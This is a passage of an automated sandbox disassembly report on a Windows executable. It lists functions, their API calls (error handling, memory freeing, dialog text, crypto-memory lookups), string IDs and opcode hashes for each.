                                                                                      • GetLastError.KERNEL32(?,0043CBE8,00422674,0043CBE8,?,?,00422213,?,?,0043CBE8), ref: 00426323
                                                                                      • _free.LIBCMT ref: 00426356
                                                                                      • _free.LIBCMT ref: 0042637E
                                                                                      • SetLastError.KERNEL32(00000000,?,0043CBE8), ref: 0042638B
                                                                                      • SetLastError.KERNEL32(00000000,?,0043CBE8), ref: 00426397
                                                                                      • _abort.LIBCMT ref: 0042639D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$_free$_abort
                                                                                      • String ID:
                                                                                      • API String ID: 3160817290-0
                                                                                      • Opcode ID: 0ada623a70582730fa45054c4f99239dbb3d3feb01f4581ffd10e15609ac9e28
                                                                                      • Instruction ID: a402012bd372f4e1ca1b3782ddb9aef1c81e3407300f5af7adfef0e7a5348c00
                                                                                      • Opcode Fuzzy Hash: 0ada623a70582730fa45054c4f99239dbb3d3feb01f4581ffd10e15609ac9e28
                                                                                      • Instruction Fuzzy Hash: ECF02D72745B3026C711BB367C4AB1B12298FC1776FB6022BFD1492291EF3DC801415D
                                                                                      Function 0041A8D4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CharUpperW.USER32(?,?,?,?,00001000), ref: 0041A92C
                                                                                      • CharUpperW.USER32(?,?,?,?,?,00001000), ref: 0041A953
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharUpper
                                                                                      • String ID: *aD$-
                                                                                      • API String ID: 9403516-225298449
                                                                                      • Opcode ID: 9f0408d775167781d3d73a3ec1760e6e55585ec9efd2bb7af3c94a516ffc8efc
                                                                                      • Instruction ID: 1162f33b1152275b3f40cae274754ede0a1f280d6a101c0d24c3e91e12c730ce
                                                                                      • Opcode Fuzzy Hash: 9f0408d775167781d3d73a3ec1760e6e55585ec9efd2bb7af3c94a516ffc8efc
                                                                                      • Instruction Fuzzy Hash: D921F8B141530655D321EB69880CBFBA698E785314F024C2BF584D6A85E67CD8F8D36F
                                                                                      Function 0041B820 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 004012E7: GetDlgItem.USER32(00000000,00003021), ref: 0040132B
                                                                                        • Part of subcall function 004012E7: SetWindowTextW.USER32(00000000,004302E4), ref: 00401341
                                                                                      • EndDialog.USER32(?,00000001), ref: 0041B86B
                                                                                      • GetDlgItemTextW.USER32(?,00000066,00000800), ref: 0041B881
                                                                                      • SetDlgItemTextW.USER32(?,00000065,?), ref: 0041B89B
                                                                                      • SetDlgItemTextW.USER32(?,00000066), ref: 0041B8A6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemText$DialogWindow
                                                                                      • String ID: RENAMEDLG
                                                                                      • API String ID: 445417207-3299779563
                                                                                      • Opcode ID: e56df44a3f49d28b651060f885f9c86b3dc55448e2b8712b3a1f357db754fba5
                                                                                      • Instruction ID: ebf52a1fa832525207de4e5a5c53ff233284eb086c51926fb5b4fa25e5bf0789
                                                                                      • Opcode Fuzzy Hash: e56df44a3f49d28b651060f885f9c86b3dc55448e2b8712b3a1f357db754fba5
                                                                                      • Instruction Fuzzy Hash: BE0145739803157AE111AAA59E48FB77B6CDF85F41F00082BF244B21A0C76AA80196BF
                                                                                      Function 00424ADF Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00424A90,?,?,00424A30,?,00437F68,0000000C,00424B87,?,00000002), ref: 00424AFF
                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00424B12
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00424A90,?,?,00424A30,?,00437F68,0000000C,00424B87,?,00000002,00000000), ref: 00424B35
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                      • API String ID: 4061214504-1276376045
                                                                                      • Opcode ID: 8d825f1051fcf2ae9bdfa6911753ad92d9f90427013952ed253254a7873343c1
                                                                                      • Instruction ID: 8fa197d7e83727dc8b81b9f1c09d242209dcca5feb3adf6075c6ba9f23e09af0
                                                                                      • Opcode Fuzzy Hash: 8d825f1051fcf2ae9bdfa6911753ad92d9f90427013952ed253254a7873343c1
                                                                                      • Instruction Fuzzy Hash: DBF06830A40118BFCB159FA5EC59B9EBFB5EF48711F500175F805A2250DF799D44CB98
                                                                                      Function 0040DEB5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0040F309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0040F324
                                                                                        • Part of subcall function 0040F309: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0040DEC8,Crypt32.dll,?,0040DF4A,?,0040DF2E,?,?,?,?), ref: 0040F346
                                                                                      • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0040DED4
                                                                                      • GetProcAddress.KERNEL32(00441E58,CryptUnprotectMemory), ref: 0040DEE4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                      • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                      • API String ID: 2141747552-1753850145
                                                                                      • Opcode ID: fe549e453d53044cb3f82184b8cbf9cbbfe0116ebab60e2271aadd83a969f2a2
                                                                                      • Instruction ID: a3cb50885851f18478d831be0a6e29e98c0c5a37f9eb91f2b4ebda6b8b46e81d
                                                                                      • Opcode Fuzzy Hash: fe549e453d53044cb3f82184b8cbf9cbbfe0116ebab60e2271aadd83a969f2a2
                                                                                      • Instruction Fuzzy Hash: 64E04FB0900B43AFDB505B75E859B06FBA47B64710F209637F014D2685DBB8D0A88B58
                                                                                      Function 004252F0 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free
                                                                                      • String ID:
                                                                                      • API String ID: 269201875-0
                                                                                      • Opcode ID: 2edb4a8e1b0fb35445fe93dbd72e18b5244141851d1ac2ea075b62d5dc218b29
                                                                                      • Instruction ID: 55d85bc308e435c11cce4c785e552d3236625a443a0e00442266915be90aebcd
                                                                                      • Opcode Fuzzy Hash: 2edb4a8e1b0fb35445fe93dbd72e18b5244141851d1ac2ea075b62d5dc218b29
                                                                                      • Instruction Fuzzy Hash: 2041EE72B006209FCB14DF78D880A5EB7F1EF88314F5545AAE905EB381DA75AD01CB88
                                                                                      Function 004289AF Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 004289B8
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004289DB
                                                                                        • Part of subcall function 004259FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,004223AA,?,0000015D,?,?,?,?,00422F29,000000FF,00000000,?,?), ref: 00425A2E
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00428A01
                                                                                      • _free.LIBCMT ref: 00428A14
                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00428A23
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                      • String ID:
                                                                                      • API String ID: 336800556-0
                                                                                      • Opcode ID: 7d5bdd618d7d46a2c65951a360a3c25941becdab276aa3dfa7c2a758fa181c4a
                                                                                      • Instruction ID: 5ee969388b481e443b28253e967ccc3161889c644780e2990321ba9501c60b45
                                                                                      • Opcode Fuzzy Hash: 7d5bdd618d7d46a2c65951a360a3c25941becdab276aa3dfa7c2a758fa181c4a
                                                                                      • Instruction Fuzzy Hash: AC0171B27026257B272156AA7C4CC7F6A6DDAC6FA1354022FB904D3205EE698C0291B9
                                                                                      Function 004263A3 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,?,?,00425E43,00425ADF,?,0042634D,00000001,00000364,?,00422213,?,?,0043CBE8), ref: 004263A8
                                                                                      • _free.LIBCMT ref: 004263DD
                                                                                      • _free.LIBCMT ref: 00426404
                                                                                      • SetLastError.KERNEL32(00000000,?,0043CBE8), ref: 00426411
                                                                                      • SetLastError.KERNEL32(00000000,?,0043CBE8), ref: 0042641A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$_free
                                                                                      • String ID:
                                                                                      • API String ID: 3170660625-0
                                                                                      • Opcode ID: d555d3f3ef661479af4959cc6f8ed992a3548d11a58c214c3a94f33d8155ca4d
                                                                                      • Instruction ID: bb53df516e62a95e51950a256051d3369eef83033b5aef9bb44ec3d4a1a25fe3
                                                                                      • Opcode Fuzzy Hash: d555d3f3ef661479af4959cc6f8ed992a3548d11a58c214c3a94f33d8155ca4d
                                                                                      • Instruction Fuzzy Hash: 5101D6B634573067870176253C89A1B262D9FD17797B2413FF85492282EE7DCC11416D
                                                                                      Function 0042926A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _free.LIBCMT ref: 00429282
                                                                                        • Part of subcall function 004259C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00429301,?,00000000,?,00000000,?,00429328,?,00000007,?,?,00429725,?), ref: 004259D8
                                                                                        • Part of subcall function 004259C2: GetLastError.KERNEL32(?,?,00429301,?,00000000,?,00000000,?,00429328,?,00000007,?,?,00429725,?,?), ref: 004259EA
                                                                                      • _free.LIBCMT ref: 00429294
                                                                                      • _free.LIBCMT ref: 004292A6
                                                                                      • _free.LIBCMT ref: 004292B8
                                                                                      • _free.LIBCMT ref: 004292CA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 776569668-0
                                                                                      • Opcode ID: a1829ea2b3eb210ceaefd532cec745a222f1351db4686e978950cec9d8d88917
                                                                                      • Instruction ID: 133d977a3d054801380cd796775e33e02f3e2e3cde2545a78cd53746e0fb53e9
                                                                                      • Opcode Fuzzy Hash: a1829ea2b3eb210ceaefd532cec745a222f1351db4686e978950cec9d8d88917
                                                                                      • Instruction Fuzzy Hash: 09F03CB2745620EB8A24EB59F882C0773E9AA04721BA85C4AF088D7651C638FC80867C
                                                                                      Function 0042553F Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _free.LIBCMT ref: 0042555D
                                                                                        • Part of subcall function 004259C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00429301,?,00000000,?,00000000,?,00429328,?,00000007,?,?,00429725,?), ref: 004259D8
                                                                                        • Part of subcall function 004259C2: GetLastError.KERNEL32(?,?,00429301,?,00000000,?,00000000,?,00429328,?,00000007,?,?,00429725,?,?), ref: 004259EA
                                                                                      • _free.LIBCMT ref: 0042556F
                                                                                      • _free.LIBCMT ref: 00425582
                                                                                      • _free.LIBCMT ref: 00425593
                                                                                      • _free.LIBCMT ref: 004255A4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 776569668-0
                                                                                      • Opcode ID: 23a7715d7dfdb1df1902732dc659bd9b695696a9c651b32b57ec6052dcaa2025
                                                                                      • Instruction ID: 34cca55894990acdd89f455b95b3aecaad4c8957479b29ce9a9e18f76f1185f0
                                                                                      • Opcode Fuzzy Hash: 23a7715d7dfdb1df1902732dc659bd9b695696a9c651b32b57ec6052dcaa2025
                                                                                      • Instruction Fuzzy Hash: 36F0BDF1612B209BCB056F19BC414093B75FF08B27385126BF49056266C739C9619ACE
                                                                                      Function 00424BDA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\file.exe,00000104), ref: 00424C1A
                                                                                      • _free.LIBCMT ref: 00424CE5
                                                                                      • _free.LIBCMT ref: 00424CEF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$FileModuleName
                                                                                      • String ID: C:\Users\user\Desktop\file.exe
                                                                                      • API String ID: 2506810119-1957095476
                                                                                      • Opcode ID: e0490f60ade2d1468c9140943e35bed9e18652c5d0527b2ae2ea00ebe4e88e47
                                                                                      • Instruction ID: 7575aa31d2d93257cdfb248a7f5de75f770f07e981ee8fe62857961938ef6c11
                                                                                      • Opcode Fuzzy Hash: e0490f60ade2d1468c9140943e35bed9e18652c5d0527b2ae2ea00ebe4e88e47
                                                                                      • Instruction Fuzzy Hash: AE317271B01228ABDB21DF9AA88199EBBF8EBC4710B51406BF80597211D7788A40CB99
                                                                                      Function 00407463 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00407468
                                                                                        • Part of subcall function 00403AA3: __EH_prolog.LIBCMT ref: 00403AA8
                                                                                      • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000), ref: 0040752E
                                                                                        • Part of subcall function 00407A9D: GetCurrentProcess.KERNEL32(00000020,?), ref: 00407AAC
                                                                                        • Part of subcall function 00407A9D: GetLastError.KERNEL32 ref: 00407AF2
                                                                                        • Part of subcall function 00407A9D: CloseHandle.KERNEL32(?), ref: 00407B01
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                      • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                      • API String ID: 3813983858-639343689
                                                                                      • Opcode ID: bf08ee1ff69437d9def4f8d3a991ac00f907d52313835109dd9fe643a1b4b2d0
                                                                                      • Instruction ID: 0ebbc69834176c0f24fc774e2054f5db0fdf3fe6e6fca9ed97e6473e2bdfabc6
                                                                                      • Opcode Fuzzy Hash: bf08ee1ff69437d9def4f8d3a991ac00f907d52313835109dd9fe643a1b4b2d0
                                                                                      • Instruction Fuzzy Hash: 41318171E44208AADF10EB65AC42BEFBB68AF44358F00407BF445B72D2D7786A44876A
                                                                                      Function 00419123 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 004012E7: GetDlgItem.USER32(00000000,00003021), ref: 0040132B
                                                                                        • Part of subcall function 004012E7: SetWindowTextW.USER32(00000000,004302E4), ref: 00401341
                                                                                      • EndDialog.USER32(?,00000001), ref: 004191AB
                                                                                      • GetDlgItemTextW.USER32(?,00000065,00000000,?), ref: 004191C0
                                                                                      • SetDlgItemTextW.USER32(?,00000065,?), ref: 004191D5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemText$DialogWindow
                                                                                      • String ID: ASKNEXTVOL
                                                                                      • API String ID: 445417207-3402441367
                                                                                      • Opcode ID: 27c9492c255a67440cc051533c36f0ea40a96704dcb89835f6127280c112fe21
                                                                                      • Instruction ID: 1ad12870d0311b6f672f0a0fa01a212b859fcd40f4e810268bc3a2f15caa4e4a
                                                                                      • Opcode Fuzzy Hash: 27c9492c255a67440cc051533c36f0ea40a96704dcb89835f6127280c112fe21
                                                                                      • Instruction Fuzzy Hash: 3511E132241212BFE2019BA49D4DFD63FA9EF4A701F000426F641AB1B1C2299CD2DB2E
                                                                                      Function 0041BFAA Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 70COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • DialogBoxParamW.USER32(GETPASSWORD1,?,00419646,?,?), ref: 0041C022
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: DialogParam
                                                                                      • String ID: *aD$*aD$GETPASSWORD1
                                                                                      • API String ID: 665744214-2661886367
                                                                                      • Opcode ID: 71f20207c6e13983ac7fc770ba50cc998914c8a9a7605082e957a74541584fbd
                                                                                      • Instruction ID: 9d421776b45a6d62717eef33d716dbef8e71b6f6fad618f6f8edc459a64e0920
                                                                                      • Opcode Fuzzy Hash: 71f20207c6e13983ac7fc770ba50cc998914c8a9a7605082e957a74541584fbd
                                                                                      • Instruction Fuzzy Hash: 54115932284204AADB119E64AC41BEB3B88B70A711F14407BFD45A7181D7BC5C80D79D
                                                                                      Function 00419646 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 004012E7: GetDlgItem.USER32(00000000,00003021), ref: 0040132B
                                                                                        • Part of subcall function 004012E7: SetWindowTextW.USER32(00000000,004302E4), ref: 00401341
                                                                                      • EndDialog.USER32(?,00000001), ref: 00419694
                                                                                      • GetDlgItemTextW.USER32(?,00000065,?,00000080), ref: 004196AC
                                                                                      • SetDlgItemTextW.USER32(?,00000066,?), ref: 004196DA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
